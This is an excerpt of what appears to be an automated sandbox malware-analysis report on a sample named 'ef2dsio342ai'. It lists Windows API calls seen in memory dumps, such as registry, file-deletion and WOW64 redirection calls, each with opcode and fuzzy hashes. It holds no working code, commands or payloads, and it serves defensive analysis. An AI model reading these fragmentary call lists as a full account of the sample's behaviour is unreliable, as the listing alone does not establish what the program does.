                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                      • String ID: SysAnimate32
                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                      • Opcode ID: 141200dceff8f65549d6b90bbc84ef5297af1c5ddbc3669a9ef665287be5a813
                                                                                                      • Instruction ID: 3c47f9f9dfe9d476526c09fe987ddb6ff7020f73a449f940cdc47773c79c4d3c
                                                                                                      • Opcode Fuzzy Hash: 141200dceff8f65549d6b90bbc84ef5297af1c5ddbc3669a9ef665287be5a813
                                                                                                      • Instruction Fuzzy Hash: 6B21AE71600209AFEB204F64DC84EBB37AAEB4A364F140619FA51E71E0D7B1DE419B70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D350AE,?,?,00D3504E,?,00DD98D8,0000000C,00D351A5,?,00000002), ref: 00D3511D
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D35130
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D350AE,?,?,00D3504E,?,00DD98D8,0000000C,00D351A5,?,00000002,00000000), ref: 00D35153
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 06a8e7b6cf9b834a7edc9744c087a298278e2b672d22272a0d3404725027efb1
                                                                                                      • Instruction ID: 629c97015cbbe2143ac153304e29d282f3ed01fd1ecca115a4562249f223de75
                                                                                                      • Opcode Fuzzy Hash: 06a8e7b6cf9b834a7edc9744c087a298278e2b672d22272a0d3404725027efb1
                                                                                                      • Instruction Fuzzy Hash: 1CF03C34A00318BFDB119F94DC59BADBFBAEF44752F440064F80AE2264CB709944CAB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32 ref: 00D6E72B
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D6E73D
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00D6E763
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                                      • API String ID: 145871493-2590602151
                                                                                                      • Opcode ID: b34caee1d234d10b4557601999a16d2be7efa58f45fbb0013a9333affecd6be9
                                                                                                      • Instruction ID: 8993b614c6e669628cfae59e2469a552ba16a5e5fad3342ce2ff7dadb4f9ddd5
                                                                                                      • Opcode Fuzzy Hash: b34caee1d234d10b4557601999a16d2be7efa58f45fbb0013a9333affecd6be9
                                                                                                      • Instruction Fuzzy Hash: 55F02B74801720DFD7735F10CC48AA93328AF21700F180D68F842E6660DF30CC48CAB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D1637F,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D1633E
                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D16350
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00D1637F,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D16362
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                      • API String ID: 145871493-3689287502
                                                                                                      • Opcode ID: 076a5adca09bb9a09a14621bd1b70f44c1b56e3b316acbd61ce343b1d0612eb9
                                                                                                      • Instruction ID: 68769f50eb87a3dd0f5ca7e5bb8fb66595129b2d5f1f3523979129121427e2dd
                                                                                                      • Opcode Fuzzy Hash: 076a5adca09bb9a09a14621bd1b70f44c1b56e3b316acbd61ce343b1d0612eb9
                                                                                                      • Instruction Fuzzy Hash: 9BE0CD32601B212B92111F157C08BDE761A9F87F2370E0115F901D2310DF70CD42C0B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D554C3,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D16304
                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D16316
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00D554C3,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D16329
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                      • API String ID: 145871493-1355242751
                                                                                                      • Opcode ID: 6ce079e8ce4b7406f4923ed33b2fdb2e412c1aec602e3d49c70f16cf39266ca8
                                                                                                      • Instruction ID: 0f777447a0915b3934480655dff9ebef48c6b6f616139bab2d8e47c9e5d8ea78
                                                                                                      • Opcode Fuzzy Hash: 6ce079e8ce4b7406f4923ed33b2fdb2e412c1aec602e3d49c70f16cf39266ca8
                                                                                                      • Instruction Fuzzy Hash: FBD012356427216B42222F25BC189CE7E16DF8BB2134D0119F812E2628CF70CD4185B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D834D9
                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00D8355B
                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D83571
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D83582
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D83594
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Delete$Copy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3226157194-0
                                                                                                      • Opcode ID: 23d1450f15a18ceb940c14be123bb6502cac79166a2eaf114dba4152c5691095
                                                                                                      • Instruction ID: f4a664aeb98a02e79715bf020d2b9566be081c1c04cb422d1d8831634f252793
                                                                                                      • Opcode Fuzzy Hash: 23d1450f15a18ceb940c14be123bb6502cac79166a2eaf114dba4152c5691095
                                                                                                      • Instruction Fuzzy Hash: 10B12AB2D00219ABDF15EBA4DC85EDEBBBDEF49714F1040A6F509E6141EA30AB448F71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00D9AD86
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00D9AD94
                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00D9ADC7
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00D9AF9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3488606520-0
                                                                                                      • Opcode ID: 8fb2c7dd4d51aafcd8659aacbb928d1b7905722e7cccfa8a93302fd2d7346a6d
                                                                                                      • Instruction ID: 156fd7b5a7702069d7339a2c78dd02f3cbaa2df1dc483bcef2f2ae0ce85105f2
                                                                                                      • Opcode Fuzzy Hash: 8fb2c7dd4d51aafcd8659aacbb928d1b7905722e7cccfa8a93302fd2d7346a6d
                                                                                                      • Instruction Fuzzy Hash: 26A18DB5604301AFD720DF28D886B2AB7E5EF54714F14885DF999DB292DB70EC40CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D9D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D9C00D,?,?), ref: 00D9D314
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D350
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D3C7
                                                                                                        • Part of subcall function 00D9D2F7: _wcslen.LIBCMT ref: 00D9D3FD
                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9C404
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D9C45F
                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00D9C4C2
                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00D9C505
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9C512
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                      • String ID:
                                                                                                      • API String ID: 826366716-0
                                                                                                      • Opcode ID: 5b92de2b611ca2429b3b8491f5f6c28b3989544416c3f99f0d3c41fcf42446b8
                                                                                                      • Instruction ID: 4b22c0f6868361cb52eb8f6aad5cca58457764515c8fbf6002afd12aca175ad6
                                                                                                      • Opcode Fuzzy Hash: 5b92de2b611ca2429b3b8491f5f6c28b3989544416c3f99f0d3c41fcf42446b8
                                                                                                      • Instruction Fuzzy Hash: CA61C431218241AFD714DF24C490E6ABBE5FF84308F14959DF49A8B2A2DB31ED45CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D7E60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D7D6E2,?), ref: 00D7E629
                                                                                                        • Part of subcall function 00D7E60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D7D6E2,?), ref: 00D7E642
                                                                                                        • Part of subcall function 00D7E9C5: GetFileAttributesW.KERNEL32(?,00D7D755), ref: 00D7E9C6
                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00D7EC9F
                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D7ECD8
                                                                                                      • _wcslen.LIBCMT ref: 00D7EE17
                                                                                                      • _wcslen.LIBCMT ref: 00D7EE2F
                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00D7EE7C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 3183298772-0
                                                                                                      • Opcode ID: 3dab839223bb895f9a4893b0866d89d59e69e9198a619673b50ce7c5a722648a
                                                                                                      • Instruction ID: aef566565c173708b63e00b10a5ba0641cb91ff0c0a01bffeec2c744807004fb
                                                                                                      • Opcode Fuzzy Hash: 3dab839223bb895f9a4893b0866d89d59e69e9198a619673b50ce7c5a722648a
                                                                                                      • Instruction Fuzzy Hash: 795143B24083855BC765EB64D8819DBB3ECEF89310F04492EF589D3151FF70A6888B76
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VariantInit.OLEAUT32(?), ref: 00D7945C
                                                                                                      • VariantClear.OLEAUT32 ref: 00D794CD
                                                                                                      • VariantClear.OLEAUT32 ref: 00D7952C
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D7959F
                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D795CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                                      • String ID:
                                                                                                      • API String ID: 4136290138-0
                                                                                                      • Opcode ID: 76636c00458faa4f950f09396bcb7a626f695a266cd376283c1319b65ffa02c9
                                                                                                      • Instruction ID: 65301da6171e0b3eccca7e3f15da1fc1962a153181ba125479e017555180b765
                                                                                                      • Opcode Fuzzy Hash: 76636c00458faa4f950f09396bcb7a626f695a266cd376283c1319b65ffa02c9
                                                                                                      • Instruction Fuzzy Hash: 18516BB5A00619EFDB10CF68C894AAAB7F9FF8D314B058559F90ADB310E730E911CB60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00D89508
                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00D89534
                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00D8958C
                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00D895B1
                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00D895B9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                      • String ID:
                                                                                                      • API String ID: 2832842796-0
                                                                                                      • Opcode ID: a3b5e9a3e2343450e057971f6af80094794448209c33b82efae6da5667cbb310
                                                                                                      • Instruction ID: e7948e4e4b16a9d916a72f94e0309b387be0bdd6117c40c2b95a5704494af314
                                                                                                      • Opcode Fuzzy Hash: a3b5e9a3e2343450e057971f6af80094794448209c33b82efae6da5667cbb310
                                                                                                      • Instruction Fuzzy Hash: DB512F35A00215AFDB15DF64C891EADBBF5FF49314F088098E849AB362CB35ED41DBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00D9989F
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00D9992F
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00D9994B
                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00D99991
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00D999B1
                                                                                                        • Part of subcall function 00D2F9E2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00D81917,?,753CE610), ref: 00D2F9FF
                                                                                                        • Part of subcall function 00D2F9E2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00D702F4,00000000,00000000,?,?,00D81917,?,753CE610,?,00D702F4), ref: 00D2FA26
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 666041331-0
                                                                                                      • Opcode ID: e5309f94e9842b4aa3df11ba1ffbe30ab283fad8544471a3f7dc0d6a00dff7ae
                                                                                                      • Instruction ID: 37acef505127472470f58673ba4a6821bf12f78f0e1a24ef90c995b397d82179
                                                                                                      • Opcode Fuzzy Hash: e5309f94e9842b4aa3df11ba1ffbe30ab283fad8544471a3f7dc0d6a00dff7ae
                                                                                                      • Instruction Fuzzy Hash: 01515B35A00205EFCB05EF58D4949ADBBB1FF09314B08909DE8569B762CB31ED85CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00DA7592
                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00DA75A9
                                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00DA75D2
                                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00D8B4D6,00000000,00000000), ref: 00DA75F7
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00DA7626
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3688381893-0
                                                                                                      • Opcode ID: dc272f99af19a4004b333dd64894db6b8b4bd516d4d56a288b1bf1556e21bbce
                                                                                                      • Instruction ID: 94103a8a79369100596349a5eca71cc5dac05e4429b88bc1d7935e23ef1514ad
                                                                                                      • Opcode Fuzzy Hash: dc272f99af19a4004b333dd64894db6b8b4bd516d4d56a288b1bf1556e21bbce
                                                                                                      • Instruction Fuzzy Hash: 1C419235A08244AFD729DF68CC48BA67BA5EB0B350F180224F956A73E1D770ED41DA70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free
                                                                                                      • String ID:
                                                                                                      • API String ID: 269201875-0
                                                                                                      • Opcode ID: cd8767576897158b382963c240485e5c0e002db07c90783d7639daa37dc12b4a
                                                                                                      • Instruction ID: 2ab6625046943737e9a447e8ce06ea649a81c7ed22c1f10521cf453edbc3dd9e
                                                                                                      • Opcode Fuzzy Hash: cd8767576897158b382963c240485e5c0e002db07c90783d7639daa37dc12b4a
